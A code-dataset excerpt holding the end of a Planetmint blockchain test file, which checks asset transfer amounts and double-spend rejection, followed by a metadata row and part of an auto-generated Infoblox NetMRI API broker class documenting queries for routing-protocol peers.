tx_transfer1_signed = tx_transfer1.sign([alice.private_key])
# TRANSFER
# `user_pk` combines two different transaction with 50 shares each and
# transfers a total of 100 shares back to `b`
tx_transfer2 = Transaction.transfer(tx_create.to_inputs([0]) +
tx_transfer1.to_inputs([0]),
[([alice.private_key], 100)],
asset_id=tx_create.id)
tx_transfer2_signed = tx_transfer2.sign([user_sk])
b.store_bulk_transactions([tx_create_signed, tx_transfer1_signed])
assert tx_transfer2_signed.validate(b) == tx_transfer2_signed
assert len(tx_transfer2_signed.outputs) == 1
assert tx_transfer2_signed.outputs[0].amount == 100
assert len(tx_transfer2_signed.inputs) == 2
fid0_input = tx_transfer2_signed.inputs[0].fulfills.txid
fid1_input = tx_transfer2_signed.inputs[1].fulfills.txid
assert fid0_input == tx_create.id
assert fid1_input == tx_transfer1.id
# In a TRANSFER transaction of a divisible asset the amount being spent in the
# inputs needs to match the amount being sent in the outputs.
# In other words `amount_in_inputs - amount_in_outputs == 0`
def test_amount_error_transfer(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
from planetmint.common.exceptions import AmountError
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
b.store_bulk_transactions([tx_create_signed])
# TRANSFER
# output amount less than input amount
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
with pytest.raises(AmountError):
tx_transfer_signed.validate(b)
# TRANSFER
# output amount greater than input amount
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 101)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
with pytest.raises(AmountError):
tx_transfer_signed.validate(b)
def test_threshold_same_public_key(alice, b, user_pk, user_sk):
# If we try to fulfill a threshold condition where each subcondition has
# the same key get_subcondition_from_vk will always return the first
# subcondition. This means that only the 1st subfulfillment will be
# generated
# Creating threshold conditions with the same key does not make sense but
# that does not mean that the code shouldn't work.
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk, user_pk], 100)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
def test_sum_amount(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset with 3 outputs with amount 1
tx_create = Transaction.create([alice.public_key], [([user_pk], 1), ([user_pk], 1), ([user_pk], 1)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# create a transfer transaction with one output and check if the amount
# is 3
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 3)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 3
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
def test_divide(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset with 1 output with amount 3
tx_create = Transaction.create([alice.public_key], [([user_pk], 3)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# create a transfer transaction with 3 outputs and check if the amount
# of each output is 1
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 1), ([alice.public_key], 1), ([alice.public_key], 1)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 3
for output in tx_transfer_signed.outputs:
assert output.amount == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
| 39.851852 | 115 | 0.684606 | 3,050 | 23,672 | 5.015738 | 0.056066 | 0.085632 | 0.107727 | 0.0436 | 0.894104 | 0.868676 | 0.85972 | 0.85253 | 0.838018 | 0.82684 | 0 | 0.01755 | 0.215275 | 23,672 | 593 | 116 | 39.919056 | 0.805932 | 0.154444 | 0 | 0.745399 | 0 | 0 | 0.029021 | 0 | 0 | 0 | 0 | 0 | 0.303681 | 1 | 0.058282 | false | 0 | 0.08589 | 0 | 0.144172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4390ee325cedc1c98efabd0b34fb9d32636693cd | 103,735 | py | Python | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | from ..broker import Broker
class DeviceRoutingProtoPeerBroker(Broker):
controller = "device_routing_proto_peers"
def show(self, **kwargs):
"""Shows the details for the specified device routing proto peer.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peer: The device routing proto peer identified by the specified DeviceRPPeerID.
:rtype device_routing_proto_peer: DeviceRoutingProtoPeer
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available device routing proto peers. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available device routing proto peers matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPLocalIPDotted: The numerical local IP address for this peer relationship's BGP connection.
:type BGPLocalIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPLocalIPDotted: The numerical local IP address for this peer relationship's BGP connection.
:type BGPLocalIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPLocalIPNumeric: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation.
:type BGPLocalIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPLocalIPNumeric: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation.
:type BGPLocalIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPLocalPort: The local TCP port number for this entry's BGP connection.
:type BGPLocalPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPLocalPort: The local TCP port number for this entry's BGP connection.
:type BGPLocalPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPPeerPort: The remote TCP port number for this entry's BGP connection.
:type BGPPeerPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPPeerPort: The remote TCP port number for this entry's BGP connection.
:type BGPPeerPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up.
:type EigrpRetransCount: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up.
:type EigrpRetransCount: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e. resent to this peer to be acknowledged.
:type EigrpRetriesCount: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e. resent to this peer to be acknowledged.
:type EigrpRetriesCount: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available.
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available.
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer.
:type OspfPeerAddresslessIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer.
:type OspfPeerAddresslessIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state, since the last time NetMRI polled the device.
:type OspfPeerEventsDelta: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state, since the last time NetMRI polled the device.
:type OspfPeerEventsDelta: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerPermanence: How this neighbor was determined, 'dynamic' for learned through the protocol, 'permanent' for configured.
:type OspfPeerPermanence: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerPermanence: How this neighbor was determined, 'dynamic' for learned through the protocol, 'permanent' for configured.
:type OspfPeerPermanence: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant.
:type OspfPeerRouterIdentDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant.
:type OspfPeerRouterIdentDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer.
:type OspfPeerRouterIdentNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer.
:type OspfPeerRouterIdentNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PeerDeviceID: The internal NetMRI identifier for the peer device.
:type PeerDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PeerDeviceID: The internal NetMRI identifier for the peer device.
:type PeerDeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available.
:type PeerInterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available.
:type PeerInterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision.
:type RPPeerChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision.
:type RPPeerChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type RPPeerEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type RPPeerEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format.
:type RPPeerIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format.
:type RPPeerIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerIPNumeric: The numerical IP address of the peer.
:type RPPeerIPNumeric: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerIPNumeric: The numerical IP address of the peer.
:type RPPeerIPNumeric: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerMapSource: Internal tracking data for NetMRI algorithms.
:type RPPeerMapSource: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerMapSource: Internal tracking data for NetMRI algorithms.
:type RPPeerMapSource: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerStartTime: The starting effective time of this revision of the record.
:type RPPeerStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerStartTime: The starting effective time of this revision of the record.
:type RPPeerStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerState: The protocol-specific state of this routing peer relationship.
:type RPPeerState: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerState: The protocol-specific state of this routing peer relationship.
:type RPPeerState: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerTimestamp: The date and time this record was collected or calculated.
:type RPPeerTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerTimestamp: The date and time this record was collected or calculated.
:type RPPeerTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example).
:type RPPeerType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example).
:type RPPeerType: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerUpSince: The date and time this peer relationship has been active, without interruption. The granularity level varies with each protocol.
:type RPPeerUpSince: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerUpSince: The date and time this peer relationship has been active, without interruption. The granularity level varies with each protocol.
:type RPPeerUpSince: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RouteProto: Identifies the routing protocol used for this peer relationship.
:type RouteProto: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RouteProto: Identifies the routing protocol used for this peer relationship.
:type RouteProto: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device routing proto peers, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BGPLocalIPDotted, BGPLocalIPNumeric, BGPLocalPort, BGPPeerPort, DataSourceID, DeviceID, DeviceRPPeerID, EigrpRetransCount, EigrpRetriesCount, IfAddrID, InterfaceID, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, PeerDeviceID, PeerInterfaceID, RPPeerChangedCols, RPPeerEndTime, RPPeerIPDotted, RPPeerIPNumeric, RPPeerMapSource, RPPeerStartTime, RPPeerState, RPPeerTimestamp, RPPeerType, RPPeerUpSince, RouteProto, RoutingAreaID.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
